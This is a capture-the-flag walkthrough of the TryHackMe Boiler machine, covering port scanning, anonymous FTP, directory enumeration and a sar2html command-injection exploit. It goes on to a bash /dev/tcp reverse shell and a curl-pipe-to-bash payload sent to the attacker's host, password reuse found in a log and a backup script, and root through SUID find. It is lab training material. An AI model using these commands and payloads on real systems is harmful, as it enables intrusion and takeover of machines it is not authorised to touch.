THM Writeup – Boiler CTF
Intermediate level CTF
Intermediate level CTF. Just enumerate, you’ll get there.
Add IP address to your hosts file:
echo '10.10.128.43 boiler.thm' >> /etc/hostsScan the target machine – find open ports first:
nmap -n -Pn -sS -p- --open -min-rate 5000 -vvv boiler.thm
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 64
80/tcp open http syn-ack ttl 64
10000/tcp open snet-sensor-mgmt syn-ack ttl 64
55007/tcp open unknown syn-ack ttl 64Get more details about open ports:
nmap -T4 -A -p 21,80,10000,55007 boiler.thm
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.152.162
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
10000/tcp open http MiniServ 1.930 (Webmin httpd)
|_http-server-header: MiniServ/1.930
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
55007/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA)
| 256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA)
|_ 256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (EdDSA)As we can see in the Nmap output, anonymous FTP login is allowed.
Login to FTP and list files:
root@attackbox:~# ftp boiler.thm
Connected to boiler.thm.
220 (vsFTPd 3.0.3)
Name (boiler.thm:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Aug 22 2019 .
drwxr-xr-x 2 ftp ftp 4096 Aug 22 2019 ..
-rw-r--r-- 1 ftp ftp 74 Aug 21 2019 .info.txt
226 Directory send OK.Download the file, we might need it later:
ftp> get .info.txt
local: .info.txt remote: .info.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .info.txt (74 bytes).
226 Transfer complete.
74 bytes received in 0.00 secs (1.3315 MB/s)
ftp>Enumeration
Now, when we browse to http://boiler.thm:10000/ we get:
So we need to use https:
Let’s search for a webmin exploit:
And we found this exploit – paste it to a file, make it executable and execute it:
root@attackbox:~# nano exploitwebmin
root@attackbox:~# chmod +x exploitwebmin
root@attackbox:~# ./exploitwebmin https://boiler.thm:10000/
Testing for RCE (CVE-2019-15107) on https://boiler.thm:10000/: OK! (target is not vulnerable)Now take a look at port 80 – browse to http://boiler.thm/:
There is only Apache Ubuntu Default Page…
Directory brute-force the web application on port 80:
gobuster dir -u http://boiler.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
===============================================================
/index.html (Status: 200)
/manual (Status: 301)
/robots.txt (Status: 200)
/joomla (Status: 301)
/server-status (Status: 403)
===============================================================Now scan the joomla directory:
dirb http://boiler.thm/joomla
---- Scanning URL: http://boiler.thm/joomla/ ----
==> DIRECTORY: http://boiler.thm/joomla/_archive/
==> DIRECTORY: http://boiler.thm/joomla/_database/
==> DIRECTORY: http://boiler.thm/joomla/_files/
==> DIRECTORY: http://boiler.thm/joomla/_test/
==> DIRECTORY: http://boiler.thm/joomla/~www/
==> DIRECTORY: http://boiler.thm/joomla/administrator/
==> DIRECTORY: http://boiler.thm/joomla/bin/
==> DIRECTORY: http://boiler.thm/joomla/build/
==> DIRECTORY: http://boiler.thm/joomla/cache/
==> DIRECTORY: http://boiler.thm/joomla/components/
==> DIRECTORY: http://boiler.thm/joomla/images/
==> DIRECTORY: http://boiler.thm/joomla/includes/
+ http://boiler.thm/joomla/index.php (CODE:200|SIZE:12474)
==> DIRECTORY: http://boiler.thm/joomla/installation/
==> DIRECTORY: http://boiler.thm/joomla/language/
==> DIRECTORY: http://boiler.thm/joomla/layouts/
==> DIRECTORY: http://boiler.thm/joomla/libraries/
==> DIRECTORY: http://boiler.thm/joomla/media/
==> DIRECTORY: http://boiler.thm/joomla/modules/
==> DIRECTORY: http://boiler.thm/joomla/plugins/
==> DIRECTORY: http://boiler.thm/joomla/templates/
==> DIRECTORY: http://boiler.thm/joomla/tests/
==> DIRECTORY: http://boiler.thm/joomla/tmp/
...More enumeration
Browse to http://boiler.thm/joomla/_archive/:
Browse to http://boiler.thm/joomla/_database/:
Looks like it is rotated.
Use CyberChef to decode the text:
Browse to http://boiler.thm/joomla/_files/:
This text is Base64 encoded.
Use CyberChef again:
We had to decode it using Base64 two times…
Browse to http://boiler.thm/joomla/_test/:
We finally found something interesting.
Getting reverse shell
Let’s search for an exploit:
root@attackbox:~# searchsploit sar2html
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
Sar2HTML 3.2.1 - Remote Command Execution | php/webapps/47204.txt
---------------------------------------------- ---------------------------------
Shellcodes: No ResultsCopy the text file to the current directory:
root@attackbox:~# searchsploit -m php/webapps/47204.txt
Exploit: Sar2HTML 3.2.1 - Remote Command Execution
URL: https://www.exploit-db.com/exploits/47204
Path: /opt/searchsploit/exploits/php/webapps/47204.txt
File Type: ASCII text, with CRLF line terminators
Copied to: /root/47204.txtNow read the exploit instructions:
root@attackbox:~# cat 47204.txt
# Exploit Title: sar2html Remote Code Execution
# Date: 01/08/2019
# Exploit Author: Furkan KAYAPINAR
# Vendor Homepage:https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Centos 7
In web application you will see index.php?plot url extension.
http://<ipaddr>/index.php?plot=;<command-here> will execute
the command you entered. After command injection press "select # host" then your command's
output will appear bottom side of the scroll screen.This is great, we have remote code execution vulnerability here.
First try a simple command e.g. http://boiler.thm/joomla/_test/index.php?plot=;id:
It works, we can see the command output in the dropdownlist. Now let’s try to get a reverse shell.
Open another terminal window and run netcat listener:
nc -lnvp 4242Create a file named shell.sh with this content:
bash -i >& /dev/tcp/10.10.152.162/4242 0>&1Edit IP address and PORT accordingly.
Run python web server:
python3 -m http.serverAnd use this command:
curl 10.10.152.162:8000/shell.sh | bashLike this:
http://boiler.thm/joomla/_test/index.php?plot=;curl 10.10.152.162:8000/shell.sh | bashWe get a reverse shell:
Upgrade the shell:
python3 -c 'import pty;pty.spawn("/bin/bash");'
CTRL+Z
stty raw -echo; fg ENTER ENTER
stty rows 30 columns 100
export TERM=xterm-256colorLateral movements
Look around – list files and folders:
www-data@Vulnerable:/var/www/html/joomla/_test$ ls -la
total 124
drwxr-xr-x 3 www-data www-data 4096 Aug 22 2019 .
drwxr-xr-x 25 www-data www-data 4096 Aug 22 2019 ..
-rwxr-xr-x 1 www-data www-data 53430 Aug 22 2019 index.php
-rwxr-xr-x 1 www-data www-data 716 Aug 21 2019 log.txt
-rwxr-xr-x 1 www-data www-data 53165 Mar 19 2019 sar2html
drwxr-xr-x 3 www-data www-data 4096 Aug 22 2019 sarFILERead the log.txt file:
www-data@Vulnerable:/var/www/html/joomla/_test$ cat log.txt
Aug 20 11:16:26 parrot sshd[2443]: Server listening on 0.0.0.0 port 22.
Aug 20 11:16:26 parrot sshd[2443]: Server listening on :: port 22.
Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: [REDACTED]
Aug 20 11:16:35 parrot sshd[2451]: pam_unix(sshd:session): session opened for user pentest by (uid=0)
Aug 20 11:16:36 parrot sshd[2466]: Received disconnect from 10.10.170.50 port 49824:11: disconnected by user
Aug 20 11:16:36 parrot sshd[2466]: Disconnected from user pentest 10.10.170.50 port 49824
Aug 20 11:16:36 parrot sshd[2451]: pam_unix(sshd:session): session closed for user pentest
Aug 20 12:24:38 parrot sshd[2443]: Received signal 15; terminating.We found username and password.
See what users we have on this machine:
www-data@Vulnerable:/var/www/html/joomla/_test$ ls -la /home/
total 16
drwxr-xr-x 4 root root 4096 Aug 22 2019 .
drwxr-xr-x 22 root root 4096 Aug 22 2019 ..
drwxr-x--- 3 basterd basterd 4096 Aug 22 2019 basterd
drwxr-x--- 3 stoner stoner 4096 Aug 22 2019 stonerGreat, so we probably have basterd’s password.
Try to switch to user basterd:
www-data@Vulnerable:/var/www/html/joomla/_test$ su basterd
Password:
basterd@Vulnerable:/var/www/html/joomla/_test$We are now basterd user, check his home directory:
basterd@Vulnerable:/var/www/html/joomla/_test$ cd ~
basterd@Vulnerable:~$ ls -la
total 16
drwxr-x--- 3 basterd basterd 4096 Aug 22 2019 .
drwxr-xr-x 4 root root 4096 Aug 22 2019 ..
-rwxr-xr-x 1 stoner basterd 699 Aug 21 2019 backup.sh
-rw------- 1 basterd basterd 0 Aug 22 2019 .bash_history
drwx------ 2 basterd basterd 4096 Aug 22 2019 .cacheThere is an interesting file backup.sh
Read the backup.sh file:
basterd@Vulnerable:~$ cat backup.sh
REMOTE=1.2.3.4
SOURCE=/home/stoner
TARGET=/usr/local/backup
LOG=/home/stoner/bck.log
DATE=`date +%y\.%m\.%d\.`
USER=stoner
#[REDACTED]
ssh $USER@$REMOTE mkdir $TARGET/$DATE
if [ -d "$SOURCE" ]; then
for i in `ls $SOURCE | grep 'data'`;do
echo "Begining copy of" $i >> $LOG
scp $SOURCE/$i $USER@$REMOTE:$TARGET/$DATE
echo $i "completed" >> $LOG
if [ -n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ];then
rm $SOURCE/$i
echo $i "removed" >> $LOG
echo "####################" >> $LOG
else
echo "Copy not complete" >> $LOG
exit 0
fi
done
else
echo "Directory is not present" >> $LOG
exit 0
fiWe’ve probably just found stoner’s password.
Try to switch to user stoner:
basterd@Vulnerable:~$ su stoner
Password:
stoner@Vulnerable:/home/basterd$And we are logged in as stoner.
Check stoner’s home directory:
stoner@Vulnerable:/home/basterd$ cd ~
stoner@Vulnerable:~$ ls -la
total 16
drwxr-x--- 3 stoner stoner 4096 Aug 22 2019 .
drwxr-xr-x 4 root root 4096 Aug 22 2019 ..
drwxrwxr-x 2 stoner stoner 4096 Aug 22 2019 .nano
-rw-r--r-- 1 stoner stoner 34 Aug 21 2019 .secret
stoner@Vulnerable:~$ cat .secret
[REDACTED]We’ve found user.txt
Privilege escalation
Now we need to escalate our privileges – see what our user can do with sudo:
stoner@Vulnerable:~$ sudo -l
User stoner may run the following commands on Vulnerable:
(root) NOPASSWD: /NotThisTime/MessinWithYaNothing here
Check files (executables) that have SUID bit set:
stoner@Vulnerable:~$ find / -type f -perm -4000 2>/dev/null
/bin/su
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping6
/bin/ping
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/apache2/suexec-custom
/usr/lib/apache2/suexec-pristine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap
/usr/bin/find
/usr/bin/at
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/newuidmapExecutable that stands out is find.
Use GTFObins to find the way to exploit it:
Awesome, we’ll get root shell by using this command.
So give it a try:
stoner@Vulnerable:~$ find . -exec /bin/bash -p \; -quit
bash-4.3# id
uid=1000(stoner) gid=1000(stoner) euid=0(root) groups=1000(stoner),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
bash-4.3#Success, our effective permissions are root.
Read the root flag:
bash-4.3# cat /root/root.txt
[REDACTED]Do you like this writeup? Check out other THM Writeups.